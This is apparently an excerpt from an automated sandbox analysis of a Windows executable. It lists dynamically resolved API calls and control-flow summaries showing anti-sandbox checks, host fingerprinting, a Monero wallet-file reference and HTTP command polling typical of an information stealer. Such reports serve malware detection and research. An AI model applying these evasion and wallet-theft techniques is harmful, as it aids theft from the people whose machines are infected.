                  • GetProcAddress.KERNEL32(74DD0000,01799E98), ref: 00C19E44
                  • GetProcAddress.KERNEL32(74DD0000,01783D40), ref: 00C19E5D
                  • GetProcAddress.KERNEL32(74DD0000,01799E20), ref: 00C19E75
                  • GetProcAddress.KERNEL32(74DD0000,01799E08), ref: 00C19E8D
                  • GetProcAddress.KERNEL32(74DD0000,01799E38), ref: 00C19EA6
                  • GetProcAddress.KERNEL32(74DD0000,01799E50), ref: 00C19EBE
                  • GetProcAddress.KERNEL32(74DD0000,01799E68), ref: 00C19ED6
                  • GetProcAddress.KERNEL32(74DD0000,01799E80), ref: 00C19EEF
                  • GetProcAddress.KERNEL32(74DD0000,01799DD8), ref: 00C19F07
                  • GetProcAddress.KERNEL32(74DD0000,01799DF0), ref: 00C19F1F
                  • GetProcAddress.KERNEL32(74DD0000,0179D500), ref: 00C19F38
                  • GetProcAddress.KERNEL32(74DD0000,0179A880), ref: 00C19F50
                  • GetProcAddress.KERNEL32(74DD0000,0179D530), ref: 00C19F68
                  • GetProcAddress.KERNEL32(74DD0000,0179D4D0), ref: 00C19F81
                  • GetProcAddress.KERNEL32(74DD0000,01784060), ref: 00C19F99
                  • GetProcAddress.KERNEL32(74DD0000,0179D5A8), ref: 00C19FB1
                  • GetProcAddress.KERNEL32(74DD0000,01783D80), ref: 00C19FCA
                  • GetProcAddress.KERNEL32(74DD0000,0179D458), ref: 00C19FE2
                  • GetProcAddress.KERNEL32(74DD0000,0179D578), ref: 00C19FFA
                  • GetProcAddress.KERNEL32(74DD0000,0177AD00), ref: 00C1A013
                  • GetProcAddress.KERNEL32(74DD0000,0179DE60), ref: 00C1A02B
                  • LoadLibraryA.KERNEL32(0179D470,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A03D
                  • LoadLibraryA.KERNEL32(0179D410,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A04E
                  • LoadLibraryA.KERNEL32(0179D698,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A060
                  • LoadLibraryA.KERNEL32(0179D488,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A072
                  • LoadLibraryA.KERNEL32(0179D428,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A083
                  • LoadLibraryA.KERNEL32(0179D668,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A095
                  • LoadLibraryA.KERNEL32(0179D518,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A0A7
                  • LoadLibraryA.KERNEL32(0179D3F8,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A0B8
                  • GetProcAddress.KERNEL32(75290000,0179DFC0), ref: 00C1A0DA
                  • GetProcAddress.KERNEL32(75290000,0179D5C0), ref: 00C1A0F2
                  • GetProcAddress.KERNEL32(75290000,01799400), ref: 00C1A10A
                  • GetProcAddress.KERNEL32(75290000,0179D5D8), ref: 00C1A123
                  • GetProcAddress.KERNEL32(75290000,0179DF60), ref: 00C1A13B
                  • GetProcAddress.KERNEL32(73560000,0178B7A8), ref: 00C1A160
                  • GetProcAddress.KERNEL32(73560000,0179DE40), ref: 00C1A179
                  • GetProcAddress.KERNEL32(73560000,0178B7D0), ref: 00C1A191
                  • GetProcAddress.KERNEL32(73560000,0178D688), ref: 00C1A1A9
                  • GetProcAddress.KERNEL32(73560000,0178D6B8), ref: 00C1A1C2
                  • GetProcAddress.KERNEL32(73560000,0179DE00), ref: 00C1A1DA
                  • GetProcAddress.KERNEL32(73560000,0179DDE0), ref: 00C1A1F2
                  • GetProcAddress.KERNEL32(73560000,0178D6D0), ref: 00C1A20B
                  • GetProcAddress.KERNEL32(752C0000,0179E060), ref: 00C1A22C
                  • GetProcAddress.KERNEL32(752C0000,0179DFE0), ref: 00C1A244
                  • GetProcAddress.KERNEL32(752C0000,0178D5B0), ref: 00C1A25D
                  • GetProcAddress.KERNEL32(752C0000,0178D5E0), ref: 00C1A275
                  • GetProcAddress.KERNEL32(752C0000,0179DFA0), ref: 00C1A28D
                  • GetProcAddress.KERNEL32(74EC0000,0178B938), ref: 00C1A2B3
                  • GetProcAddress.KERNEL32(74EC0000,0178BA00), ref: 00C1A2CB
                  • GetProcAddress.KERNEL32(74EC0000,0178D538), ref: 00C1A2E3
                  • GetProcAddress.KERNEL32(74EC0000,0179DE20), ref: 00C1A2FC
                  • GetProcAddress.KERNEL32(74EC0000,0179DEE0), ref: 00C1A314
                  • GetProcAddress.KERNEL32(74EC0000,0178BA28), ref: 00C1A32C
                  • GetProcAddress.KERNEL32(75BD0000,0178D568), ref: 00C1A352
                  • GetProcAddress.KERNEL32(75BD0000,0179E000), ref: 00C1A36A
                  • GetProcAddress.KERNEL32(75BD0000,01799450), ref: 00C1A382
                  • GetProcAddress.KERNEL32(75BD0000,0178D580), ref: 00C1A39B
                  • GetProcAddress.KERNEL32(75BD0000,0178D5C8), ref: 00C1A3B3
                  • GetProcAddress.KERNEL32(75BD0000,0179E020), ref: 00C1A3CB
                  • GetProcAddress.KERNEL32(75BD0000,0179DF80), ref: 00C1A3E4
                  • GetProcAddress.KERNEL32(75BD0000,0178D598), ref: 00C1A3FC
                  • GetProcAddress.KERNEL32(75BD0000,0178D5F8), ref: 00C1A414
                  • GetProcAddress.KERNEL32(75A70000,0179DF00), ref: 00C1A436
                  • GetProcAddress.KERNEL32(75A70000,0179E1F0), ref: 00C1A44E
                  • GetProcAddress.KERNEL32(75A70000,0179E190), ref: 00C1A466
                  • GetProcAddress.KERNEL32(75A70000,0179E268), ref: 00C1A47F
                  • GetProcAddress.KERNEL32(75A70000,0179E130), ref: 00C1A497
                  • GetProcAddress.KERNEL32(75450000,0179DF20), ref: 00C1A4B8
                  • GetProcAddress.KERNEL32(75450000,0179DD20), ref: 00C1A4D1
                  • GetProcAddress.KERNEL32(75DA0000,0179DD00), ref: 00C1A4F2
                  • GetProcAddress.KERNEL32(75DA0000,0179E1C0), ref: 00C1A50A
                  • GetProcAddress.KERNEL32(6F070000,0179E080), ref: 00C1A530
                  • GetProcAddress.KERNEL32(6F070000,0179DD80), ref: 00C1A548
                  • GetProcAddress.KERNEL32(6F070000,0179DF40), ref: 00C1A560
                  • GetProcAddress.KERNEL32(6F070000,0179E280), ref: 00C1A579
                  • GetProcAddress.KERNEL32(6F070000,0179E040), ref: 00C1A591
                  • GetProcAddress.KERNEL32(6F070000,0179E0A0), ref: 00C1A5A9
                  • GetProcAddress.KERNEL32(6F070000,0179DD40), ref: 00C1A5C2
                  • GetProcAddress.KERNEL32(6F070000,0179DE80), ref: 00C1A5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C1A5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C1A607
                  • GetProcAddress.KERNEL32(75AF0000,0179E208), ref: 00C1A629
                  • GetProcAddress.KERNEL32(75AF0000,01799500), ref: 00C1A641
                  • GetProcAddress.KERNEL32(75AF0000,0179E298), ref: 00C1A659
                  • GetProcAddress.KERNEL32(75AF0000,0179E2B0), ref: 00C1A672
                  • GetProcAddress.KERNEL32(75D90000,0179DDA0), ref: 00C1A693
                  • GetProcAddress.KERNEL32(6FAB0000,0179E2C8), ref: 00C1A6B4
                  • GetProcAddress.KERNEL32(6FAB0000,0179DDC0), ref: 00C1A6CD
                  • GetProcAddress.KERNEL32(6FAB0000,0179E100), ref: 00C1A6E5
                  • GetProcAddress.KERNEL32(6FAB0000,0179E220), ref: 00C1A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 0a11f06740e9870bc503db2769d60b32cd3844176044b9029eb9d9732d7db3fe
                  • Instruction ID: d5fd0f3aa8f2992042a4003268dc264bb1be57af3353ac028404aed7d9c77eb5
                  • Opcode Fuzzy Hash: 0a11f06740e9870bc503db2769d60b32cd3844176044b9029eb9d9732d7db3fe
                  • Instruction Fuzzy Hash: 00624FBD5C0200AFD368DFAAED8C9563BF9F74E22170D453BA605E3224D639944BDB12

                  Control-flow Graph
                  • Rendered graph omitted. Basic blocks c15510-c15ac6; StrCmpCA is called from several blocks (c155d7-c1564c, c15693-c156a9, c1571e-c15793, c157da-c1585f, c158d3-c15948, c1598f-c15a14) and Sleep at c15a16-c15a21, which loops back to c1557c-c15583.
                  APIs
                    • Part of subcall function 00C1A820: lstrlen.KERNEL32(00C04F05,?,?,00C04F05,00C20DDE), ref: 00C1A82B
                    • Part of subcall function 00C1A820: lstrcpy.KERNEL32(00C20DDE,00000000), ref: 00C1A885
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C156A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15857
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15228
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15318
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C1532F
                    • Part of subcall function 00C152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C15364
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C15383
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C153AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C1578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00C15A1B
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 775d609c999740530ed2d41003c3a3e8ee9d78b37a6be680448881a023f17635
                  • Instruction ID: 73878415c728e23a30a26d47de10559d85dd49f00915e5e722ac2603d6c3ad01
                  • Opcode Fuzzy Hash: 775d609c999740530ed2d41003c3a3e8ee9d78b37a6be680448881a023f17635
                  • Instruction Fuzzy Hash: 98E18171910104AADB14FBB1DD52EFD7338AF96310F548128B406661D2EF34AB8EFB92

                  Control-flow Graph
                  • Rendered graph omitted. Basic blocks c117a0-c119cd; StrCmpCA at c117a0-c117cd with ExitProcess on the c117cf-c117d1 branch, then a dispatch at c11817-c1181a into a chain of StrCmpCA comparisons between c1185d and c11981, all converging on c1199e-c119bd.
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00C117C5
                  • ExitProcess.KERNEL32 ref: 00C117D1
                  Strings
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 7edca8a6c935f9e49153a20548ded1bd94eecae900248ea2f1b233a100aeddd5
                  • Instruction ID: 15cbb35ee785410be6af3870bce0c52a275f62bfff3e9476d8cf54c203c792c3
                  • Opcode Fuzzy Hash: 7edca8a6c935f9e49153a20548ded1bd94eecae900248ea2f1b233a100aeddd5
                  • Instruction Fuzzy Hash: 3351B2B4A00209EFDB04DFA1D954BFE77B5FF45304F148059E91167281D774EA82EB62

                  Control-flow Graph
                  • Rendered graph omitted. Basic blocks c17500-c1768e; GetWindowsDirectoryA at c17500-c1754a, GetVolumeInformationA at c17553-c175c7, GetProcessHeap and RtlAllocateHeap at c175fc-c17617, wsprintfA at c17628-c17658.
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C17542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C1757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C1760A
                  • wsprintfA.USER32 ref: 00C17640
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 201ce0bf35e2670532299f7b3608908712682f84b6bdadc13987a5549f0cccd1
                  • Instruction ID: 651d460d1f6eb23c0d59a58f7f4ab165307619f65254b380f176af6403b7843f
                  • Opcode Fuzzy Hash: 201ce0bf35e2670532299f7b3608908712682f84b6bdadc13987a5549f0cccd1
                  • Instruction Fuzzy Hash: 7E41AEB1944248ABDB10DF94DC45BEEBBB8AB09710F140199F50967280DB78AA88DBA1

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798E38), ref: 00C198A1
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798DA8), ref: 00C198BA
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798F88), ref: 00C198D2
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798EB0), ref: 00C198EA
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798D90), ref: 00C19903
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01799480), ref: 00C1991B
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783DC0), ref: 00C19933
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783EE0), ref: 00C1994C
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798F70), ref: 00C19964
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798DC0), ref: 00C1997C
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798E80), ref: 00C19995
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798D78), ref: 00C199AD
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783E80), ref: 00C199C5
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798FA0), ref: 00C199DE
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C011D0: ExitProcess.KERNEL32 ref: 00C01211
                    • Part of subcall function 00C01160: GetSystemInfo.KERNEL32(?), ref: 00C0116A
                    • Part of subcall function 00C01160: ExitProcess.KERNEL32 ref: 00C0117E
                    • Part of subcall function 00C01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C0112B
                    • Part of subcall function 00C01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C01132
                    • Part of subcall function 00C01110: ExitProcess.KERNEL32 ref: 00C01143
                    • Part of subcall function 00C01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C0123E
                    • Part of subcall function 00C01220: __aulldiv.LIBCMT ref: 00C01258
                    • Part of subcall function 00C01220: __aulldiv.LIBCMT ref: 00C01266
                    • Part of subcall function 00C01220: ExitProcess.KERNEL32 ref: 00C01294
                    • Part of subcall function 00C16770: GetUserDefaultLangID.KERNEL32 ref: 00C16774
                    • Part of subcall function 00C01190: ExitProcess.KERNEL32 ref: 00C011C6
                    • Part of subcall function 00C17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                    • Part of subcall function 00C17850: RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                    • Part of subcall function 00C17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                    • Part of subcall function 00C178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                    • Part of subcall function 00C178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                    • Part of subcall function 00C178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00C16AF9
                  • Sleep.KERNEL32(00001770), ref: 00C16B04
                  • CloseHandle.KERNEL32(?,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16B1A
                  • ExitProcess.KERNEL32 ref: 00C16B22
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 1291fa155b195164fb9024f01f7674ea3330dfeabdb636a8f51243f4f529d375
                  • Instruction ID: babbbb12c746e7ffbe6f410abb04a669412695050effd844dc02a34236ccfe56
                  • Opcode Fuzzy Hash: 1291fa155b195164fb9024f01f7674ea3330dfeabdb636a8f51243f4f529d375
                  • Instruction Fuzzy Hash: 5B314371940208ABEB04FBF1DC56FEE7738AF06350F144528F612A21C2DF705986F6A2

                  Control-flow Graph
                  • Rendered graph omitted. Basic blocks c01220-c0129d; GlobalMemoryStatusEx at c01220-c01247, two __aulldiv calls at c01249-c01271, ExitProcess on the c01292-c01294 branch.
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C0123E
                  • __aulldiv.LIBCMT ref: 00C01258
                  • __aulldiv.LIBCMT ref: 00C01266
                  • ExitProcess.KERNEL32 ref: 00C01294
                  Strings
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 95ce03252061e0d0e8330a63867170ff73698a053174b17c69f43161da9b5b9d
                  • Instruction ID: 067bd80a24980570d895fc138421b6650ba7376c2d53ecf05f43a0f226967913
                  • Opcode Fuzzy Hash: 95ce03252061e0d0e8330a63867170ff73698a053174b17c69f43161da9b5b9d
                  • Instruction Fuzzy Hash: FB016DB0D84308FAEB10DBE0CC49B9EBB78AF04701F288058FB05B62C0D7749686D799

                  Control-flow Graph (basic blocks and edges recovered from the graph rendering; the executed / not-executed colouring is not preserved in text)
                  • 1218: c16af3 -> 1219
                  • 1219: c16b0a -> 1221, 1222
                  • 1221: c16aba-c16ad7, call c1aad0, OpenEventA -> 1227, 1228
                  • 1222: c16b0c-c16b22, call c16920, call c15b10, CloseHandle, ExitProcess
                  • 1227: c16af5-c16b04, CloseHandle, Sleep -> 1219
                  • 1228: c16ad9-c16af1, call c1aad0, CreateEventA -> 1222
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00C16AF9
                  • Sleep.KERNEL32(00001770), ref: 00C16B04
                  • CloseHandle.KERNEL32(?,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16B1A
                  • ExitProcess.KERNEL32 ref: 00C16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 017db36a369686b7ea03559b377e81a62119db40d087cdc5fb1e5d288150804c
                  • Instruction ID: 2288466430cf1ccc8b4d4f174864b04df074273d121c5f99942dc4a19666712e
                  • Opcode Fuzzy Hash: 017db36a369686b7ea03559b377e81a62119db40d087cdc5fb1e5d288150804c
                  • Instruction Fuzzy Hash: 84F05E34A84209AFE710ABA1DC0ABFD7B34EF06751F144525F512B11C1CBB05585FA66

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 79108e3a01a90adc9ee515539b80769a46a43beaa6696dc95d1982c371eef89f
                  • Instruction ID: 66219d99fa5fd395c3744a9c0184831ca4094d199dfeadd3f1489ca08c8386da
                  • Opcode Fuzzy Hash: 79108e3a01a90adc9ee515539b80769a46a43beaa6696dc95d1982c371eef89f
                  • Instruction Fuzzy Hash: 0D216FB1D00208ABDF10DFA4E849ADE7B74FF45320F108625F915A72C0EB706A09DF81

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C06280: InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                    • Part of subcall function 00C06280: StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                    • Part of subcall function 00C06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                    • Part of subcall function 00C06280: HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                    • Part of subcall function 00C06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                    • Part of subcall function 00C06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: b1d48e18fc5bbb8274be8fab826696d3815c7c666475b80bf1316ac3d69f8c7f
                  • Instruction ID: fa8a550233c858fb586b080b201d83cdc7857ba6f350de335c2b6ddca5ddaa22
                  • Opcode Fuzzy Hash: b1d48e18fc5bbb8274be8fab826696d3815c7c666475b80bf1316ac3d69f8c7f
                  • Instruction Fuzzy Hash: 01115230901008ABDB14FF71DD52AED7338AF51310F444168F81A5B5D2EF30AB86FA91
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C0112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C01132
                  • ExitProcess.KERNEL32 ref: 00C01143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 6d762e4e89647e9b9cc72f60756b5709b6178da315c3b89507f85447e7e6b6f7
                  • Instruction ID: 4e74d46c1d692d84abbf7300897ab83a099609c875bfd1a5043aabf35835db79
                  • Opcode Fuzzy Hash: 6d762e4e89647e9b9cc72f60756b5709b6178da315c3b89507f85447e7e6b6f7
                  • Instruction Fuzzy Hash: 82E08674985308FFE7146FA19C0EB0D76B8EB05B15F140055F709761C0C6B426059699
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C010B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C010F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 6d607c78b844274163314591470fb35e184b5ca63ab366c415cbdfd2d31e99f2
                  • Instruction ID: 70f4a4eaf1a3f947b145da0c7786f4ba155e4bb464f899cdc0b19607059ac626
                  • Opcode Fuzzy Hash: 6d607c78b844274163314591470fb35e184b5ca63ab366c415cbdfd2d31e99f2
                  • Instruction Fuzzy Hash: A7F0E271681218BBE7149BA4AC49FAAB7E8E706B25F300458F944E3280D5719F44DAA0
                  APIs
                    • Part of subcall function 00C178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                    • Part of subcall function 00C178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                    • Part of subcall function 00C178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                    • Part of subcall function 00C17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                    • Part of subcall function 00C17850: RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                    • Part of subcall function 00C17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                  • ExitProcess.KERNEL32 ref: 00C011C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 89ba8a9b7b40e23688b957b523034400e4f063add174b245bb91cf8e49cf1016
                  • Instruction ID: 417045e782272bbe22e078344cb62ed5c6878965b8d4dca0ba058805fb28bab8
                  • Opcode Fuzzy Hash: 89ba8a9b7b40e23688b957b523034400e4f063add174b245bb91cf8e49cf1016
                  • Instruction Fuzzy Hash: C5E0CD7594430157DA0033B16C0AB5A325C5B02345F0C0434FF08F2142FD14F545F565
                  APIs
                  • wsprintfA.USER32 ref: 00C138CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00C138E3
                  • lstrcat.KERNEL32(?,?), ref: 00C13935
                  • StrCmpCA.SHLWAPI(?,00C20F70), ref: 00C13947
                  • StrCmpCA.SHLWAPI(?,00C20F74), ref: 00C1395D
